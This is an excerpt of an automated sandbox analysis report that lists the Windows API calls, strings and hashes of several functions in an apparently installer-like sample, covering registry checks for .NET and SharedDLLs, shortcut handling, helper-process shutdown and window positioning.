                                                                  Function 0041B3A4 Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B3BB
                                                                  • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3C5
                                                                  • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3D7
                                                                  • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3EE
                                                                  • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3FA
                                                                  • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B427
                                                                  • 73A1A480.USER32(00000000,00000000,0041B45A,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B44D
                                                                  • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                                  • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                                  • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                                  • DeleteDC.GDI32(?), ref: 0041B4D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$Delete$A26180A480A570Stretch
                                                                  • String ID:
                                                                  • API String ID: 359944910-0
                                                                  • Opcode ID: eea4d520f28c0b9b1f45a8d73eca5c5381e7292da506ec26be0ce79386cc84d5
                                                                  • Instruction ID: 33ab0b3d7217a913ee79b1f77f60082389afcfeada11791300d2e7ee1e5313f5
                                                                  • Opcode Fuzzy Hash: eea4d520f28c0b9b1f45a8d73eca5c5381e7292da506ec26be0ce79386cc84d5
                                                                  • Instruction Fuzzy Hash: FC41BC71E44619AFDB10DAE9C946FEFB7BCEB08704F104466B614F7281D678AD408BA8
                                                                  Function 00472930 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 337COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472AE8
                                                                  • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472BEF
                                                                  • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472C05
                                                                  • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472C2A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                  • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                  • API String ID: 971782779-3668018701
                                                                  • Opcode ID: ca3bd86af9356875fb255c0965e6d4b7c6ab4e57c2ddb924be80171e39f68e51
                                                                  • Instruction ID: fd1e6c444996228d4851cdbb4885a0c41f61386fce8022a34f2115261328fc48
                                                                  • Opcode Fuzzy Hash: ca3bd86af9356875fb255c0965e6d4b7c6ab4e57c2ddb924be80171e39f68e51
                                                                  • Instruction Fuzzy Hash: 06D13574A001499FDB11EFA9D981BDEBBF4AF08304F50806AF904B7392D778AD45CB69
                                                                  Function 00454848 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,?,00000000,?,00000000,00454AE1,?,0045A98A,00000003,00000000,00000000,00454B18), ref: 00454961
                                                                    • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                                  • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 004549E5
                                                                  • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 00454A14
                                                                  Strings
                                                                  • RegOpenKeyEx, xrefs: 004548E4
                                                                  • , xrefs: 004548D2
                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045487F
                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548B8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$FormatMessageOpen
                                                                  • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                  • API String ID: 2812809588-1577016196
                                                                  • Opcode ID: 0e91def5215c87c363aa53ad37b130579f95eb5f388cba70c6f61ed9a91dbc8c
                                                                  • Instruction ID: ff4e522da132bb0e31d6f3ae6b90b680e2e6169bdaf0a1bf0a59660f44ee0e74
                                                                  • Opcode Fuzzy Hash: 0e91def5215c87c363aa53ad37b130579f95eb5f388cba70c6f61ed9a91dbc8c
                                                                  • Instruction Fuzzy Hash: 5B912571E44108ABDB40DFD5D942BDEB7F8EB48309F10406AF900FB682D6789E459B69
                                                                  Function 00459278 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00459184: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 0045931F
                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 00459389
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 004593F0
                                                                  Strings
                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004593A3
                                                                  • .NET Framework not found, xrefs: 0045943D
                                                                  • v1.1.4322, xrefs: 004593E2
                                                                  • v4.0.30319, xrefs: 00459311
                                                                  • v2.0.50727, xrefs: 0045937B
                                                                  • .NET Framework version %s not found, xrefs: 00459429
                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045933C
                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004592D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Close$Open
                                                                  • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                  • API String ID: 2976201327-446240816
                                                                  • Opcode ID: 4a110fd54c67272918f155c84fd5e7c55fc1eb208e7566f68b065823514e3926
                                                                  • Instruction ID: b06f59bb3d6be91165b8bdbc27cbaff9901adf20ec6b7ffb5bff20868c6d7bc9
                                                                  • Opcode Fuzzy Hash: 4a110fd54c67272918f155c84fd5e7c55fc1eb208e7566f68b065823514e3926
                                                                  • Instruction Fuzzy Hash: 7F51A131A04144EBCB00DFA988A17EE77B6DB49305F54447BE800DB382E63D9E0ACB58
                                                                  Function 00458864 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(?), ref: 0045889B
                                                                  • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004588B7
                                                                  • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004588C5
                                                                  • GetExitCodeProcess.KERNEL32(?), ref: 004588D6
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045891D
                                                                  • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458939
                                                                  Strings
                                                                  • Helper isn't responding; killing it., xrefs: 004588A7
                                                                  • Stopping 64-bit helper process. (PID: %u), xrefs: 0045888D
                                                                  • Helper process exited, but failed to get exit code., xrefs: 0045890F
                                                                  • Helper process exited., xrefs: 004588E5
                                                                  • Helper process exited with failure code: 0x%x, xrefs: 00458903
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                  • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                  • API String ID: 3355656108-1243109208
                                                                  • Opcode ID: dbcea0f0447e14293e2ba497c2ba511ba70dab0111fa353bc66056d4bed30cc0
                                                                  • Instruction ID: 5c1f132ce02699e8ecfae473a4aa832f70e08e49b07aa2054fbd8a494dc4d87a
                                                                  • Opcode Fuzzy Hash: dbcea0f0447e14293e2ba497c2ba511ba70dab0111fa353bc66056d4bed30cc0
                                                                  • Instruction Fuzzy Hash: 582171706087409AD710E779C44575BB6D4AF48309F00C82FB9DAD7693DE7CE8488B6B
                                                                  Function 004544FC Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042DDDC: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE08
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 00454623
                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 0045475F
                                                                    • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                                  Strings
                                                                  • , xrefs: 00454585
                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045453B
                                                                  • RegCreateKeyEx, xrefs: 00454597
                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045456B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateFormatMessageQueryValue
                                                                  • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                  • API String ID: 2481121983-1280779767
                                                                  • Opcode ID: fb036eabf5a146f2d7e855c45c9778b44f21e44f1b6b00b130857789a6a7aa14
                                                                  • Instruction ID: 79a928fbfbb5cbc52e9f584d13fa8ff479f10e23804a0d57af644d787f67e4fc
                                                                  • Opcode Fuzzy Hash: fb036eabf5a146f2d7e855c45c9778b44f21e44f1b6b00b130857789a6a7aa14
                                                                  • Instruction Fuzzy Hash: 4C812275A00209AFDB00DFD5C841BEEB7B9EF49305F50452AF900FB292D7789A49CB69
                                                                  Function 0049615C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00453890: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                                    • Part of subcall function 00453890: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 004961D9
                                                                  • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049632D), ref: 004961FA
                                                                  • CreateWindowExA.USER32(00000000,STATIC,0049633C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496221
                                                                  • SetWindowLongA.USER32(?,000000FC,004959B4), ref: 00496234
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC,0049633C), ref: 00496264
                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004962D8
                                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000), ref: 004962E4
                                                                    • Part of subcall function 00453D04: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                                  • 73A25CF0.USER32(?,00496307,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC), ref: 004962FA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                  • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                  • API String ID: 170458502-2312673372
                                                                  • Opcode ID: 9b06694425e575e437806c69a3063783cd4ae9b2f688ab1fdd8fd86893ac9854
                                                                  • Instruction ID: 59c6668a25180793b9734d4b881d6428f2164d7595bd96eb0933aaec2009094d
                                                                  • Opcode Fuzzy Hash: 9b06694425e575e437806c69a3063783cd4ae9b2f688ab1fdd8fd86893ac9854
                                                                  • Instruction Fuzzy Hash: 30413070A00204AFDF11EBA5DD42FAE7BB8EB09714F61457AF500F7291D7799A048B68
                                                                  Function 0042E410 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 86registrylibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E439
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E43F
                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E48D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCloseHandleModuleProc
                                                                  • String ID: %aE$.DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                  • API String ID: 4190037839-4073108654
                                                                  • Opcode ID: 2da1f24d3b2dac621d95ef46090c641aa8f16fa50bf8c44a058beec2af7c6974
                                                                  • Instruction ID: 54e13c124a033066941eeca65415b1323707e8dcf3020f71d3dbb5d1a98da02b
                                                                  • Opcode Fuzzy Hash: 2da1f24d3b2dac621d95ef46090c641aa8f16fa50bf8c44a058beec2af7c6974
                                                                  • Instruction Fuzzy Hash: C5214430B10225BBDB00EAE7DC45B9E76B8EB48708F904477A500E7281E77CDE419B1C
                                                                  Function 00462818 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetActiveWindow.USER32 ref: 00462824
                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462838
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462845
                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462852
                                                                  • GetWindowRect.USER32(?,00000000), ref: 0046289E
                                                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004628DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                  • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                  • API String ID: 2610873146-3407710046
                                                                  • Opcode ID: 1a12ae3bf6497ff777cd16400bb62bc7ce249fae767d1011b5c9c7ae1396f400
                                                                  • Instruction ID: 4c37a186de2a83ca6a9e6f1427afc5cce354ac5e92891655707437263646b99d
                                                                  • Opcode Fuzzy Hash: 1a12ae3bf6497ff777cd16400bb62bc7ce249fae767d1011b5c9c7ae1396f400
                                                                  • Instruction Fuzzy Hash: 8621C571700B006BD310E664DD41F3B3798EB84710F08063AF984DB3D2EAB8EC008B9A
                                                                  Function 0042F180 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetActiveWindow.USER32 ref: 0042F18C
                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A0
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1AD
                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1BA
                                                                  • GetWindowRect.USER32(?,00000000), ref: 0042F206
                                                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F244
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                  • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                  • API String ID: 2610873146-3407710046
                                                                  • Opcode ID: f060aae0b7a5edf3cc9df1b8e2ac1156138d1c343137e24e009784064c48acd9
                                                                  • Instruction ID: fe4b6ce3f65a79f89e9c436b8398c0b3b6e1cac74b3897b930778965e8aa8e9e
                                                                  • Opcode Fuzzy Hash: f060aae0b7a5edf3cc9df1b8e2ac1156138d1c343137e24e009784064c48acd9
                                                                  • Instruction Fuzzy Hash: 8A21D479300710ABD700D668EC81F3B36E8EB85710F88457AF944DB3C1DA79EC048BA9
                                                                  Function 00458A3C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458C1B,?,00000000,00458C7E,?,?,02213858,00000000), ref: 00458A99
                                                                  • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458AF6
                                                                  • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458B03
                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458B4F
                                                                  • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000), ref: 00458B75
                                                                  • GetLastError.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000), ref: 00458B7C
                                                                    • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                  • String ID: CreateEvent$TransactNamedPipe
                                                                  • API String ID: 2182916169-3012584893
                                                                  • Opcode ID: 893ade2b7d25531ff66c13e68608fa62c4cd61168c1a2b8304732b74ac398c25
                                                                  • Instruction ID: 8abbb299140198d1acf2f300c186b6d7a0c7583c2a92940a340f901db1703015
                                                                  • Opcode Fuzzy Hash: 893ade2b7d25531ff66c13e68608fa62c4cd61168c1a2b8304732b74ac398c25
                                                                  • Instruction Fuzzy Hash: D4418771A00608EFDB15DF95CD81F9EB7F8EB48714F10406AF904F7292DA789E44CA28
